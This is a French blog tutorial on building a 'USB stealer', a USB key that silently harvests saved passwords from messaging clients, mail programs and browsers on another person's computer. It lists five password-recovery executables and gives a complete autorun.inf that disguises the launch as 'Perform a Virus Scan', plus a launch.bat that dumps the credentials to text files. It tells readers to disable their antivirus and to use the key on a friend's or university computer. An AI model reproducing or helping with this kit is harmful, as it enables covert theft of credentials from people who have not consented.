Accéder au contenu principal

Comment créer votre propre voleur USB?

 

Comment créer votre propre voleur USB?

Faxel
Créez votre propre voleur USB avec ce didacticiel

Qu'est-ce qu'un voleur USB?

Un voleur USB est un outil de piratage de mot de passe basé sur Windows qui aide à extraire le mot de passe des applications Windows telles que le mot de passe Chrome, le mot de passe FireFox, NetPassword, les mots de passe administrateur de l'ordinateur Windows.

Dans ce didacticiel, je vais vous montrer comment créer votre propre voleur de mot de passe USB.

Comme nous le savons tous, Windows stocke la plupart des mots de passe qui sont utilisés quotidiennement, y compris les mots de passe de messagerie instantanée tels que MSN, Yahoo, AOL, Windows Messenger, etc.

Parallèlement à cela, Windows stocke également les mots de passe des comptes Outlook Express, SMTP, POP, FTP et les mots de passe à saisie semi-automatique de nombreux navigateurs tels que IE et Firefox. Il existe de nombreux outils pour récupérer ces mots de passe à partir de leurs emplacements stockés. En utilisant ces outils et une clé USB, vous pouvez créer votre propre rootkit pour pirater les mots de passe de l’ordinateur de votre ami / collège.

Pendant que vous créez vos propres voleurs, une meilleure compréhension de certaines commandes d’exécution de Windows et de certains raccourcis clavier peut vous aider davantage!

Nous avons besoin des outils suivants pour créer notre root kit:

MessenPass

Récupère les mots de passe des programmes de messagerie instantanée les plus populaires: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x / 2003, AOL Instant Messenger fourni avec Netscape 7, Trillian, Miranda et GAIM.


Télécharger MessenPass


Mail PassView

Récupère les mots de passe des programmes de messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (comptes POP3, IMAP, HTTP et SMTP), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail gratuit.


Mail PassView peut également récupérer les mots de passe des comptes de messagerie Web (HotMail, Yahoo !, Gmail), si vous utilisez les programmes associés à ces comptes.


Télécharger Mail PassView

IE Passview

IE PassView est un petit utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Il prend en charge le nouvel Internet Explorer 7.0, ainsi que les anciennes versions d'Internet Explorer, v4.0 - v6.0

Télécharger IE Passview

Stockage protégé PassView

Récupère tous les mots de passe stockés dans le stockage protégé, y compris les mots de passe de saisie semi-automatique d'Internet Explorer, les mots de passe des sites protégés par mot de passe, les mots de passe MSN Explorer, etc.

Télécharger le stockage protégé PassView

PasswordFox

PasswordFox est un petit outil de récupération de mot de passe qui vous permet d'afficher les noms d'utilisateur et les mots de passe stockés par le navigateur Web Mozilla Firefox. Par défaut, PasswordFox affiche les mots de passe stockés dans votre profil actuel, mais vous pouvez facilement choisir de regarder les mots de passe de tout autre profil Firefox. Pour chaque entrée de mot de passe, les informations suivantes s'affichent: index d'enregistrement, site Web, nom d'utilisateur, mot de passe, champ de nom d'utilisateur, champ de mot de passe et nom de fichier Signons.

Télécharger PasswordFox

Voici une procédure étape par étape pour créer la boîte à outils de piratage de mot de passe:

REMARQUE: vous devez désactiver temporairement votre antivirus avant de suivre ces étapes.

Étape 1.

Téléchargez les 5 outils, extrayez-les et copiez uniquement l'exécutable (fichiers .exe) sur votre clé USB.

c'est-à-dire : copiez les fichiers – mspass.exe, mailpv.exe, iepv.exe, pspv.exe et passwordfox.exe sur votre clé USB.

Étape 2.

Créez un nouveau document texte (à l'aide d'un bloc-notes) et écrivez-y le texte suivant:

Code:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from

Renommez le fichier texte en «autorun.inf».

Copiez maintenant le fichier autorun.inf sur votre clé USB.

Étape 3.

Créez un autre bloc-notes et écrivez le texte suivant dessus:

Code:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Enregistrez le Bloc-notes et renommez-le «launch.bat».

Copiez également le fichier launch.bat sur votre clé USB.

Mec, vous l'avez fait!

Bingo! Votre root kit est maintenant prêt et vous êtes prêt à pirater les mots de passe. Vous pouvez utiliser cette clé USB sur le PC de votre ami ou sur l’ordinateur de votre université. Suivez simplement ces étapes

1. Insérez la clé USB et la fenêtre d'exécution automatique apparaîtra. (C'est parce que nous avons créé une clé USB lancement automatique).

2. Dans la fenêtre contextuelle, sélectionnez la première option (Effectuer une analyse antivirus).

3. Désormais, tous les outils de piratage de mot de passe seront exécutés silencieusement en arrière-plan (ce processus prend à peine quelques secondes). Les mots de passe sont stockés dans le fichier.txt

4. Retirez la clé USB et vous verrez les mots de passe stockés dans les fichiers .txt

Telegram Canal : https://t.me/Hacker_Termux1

Telegram Canal : https://t.me/Krypton17

Faxel

Commentaires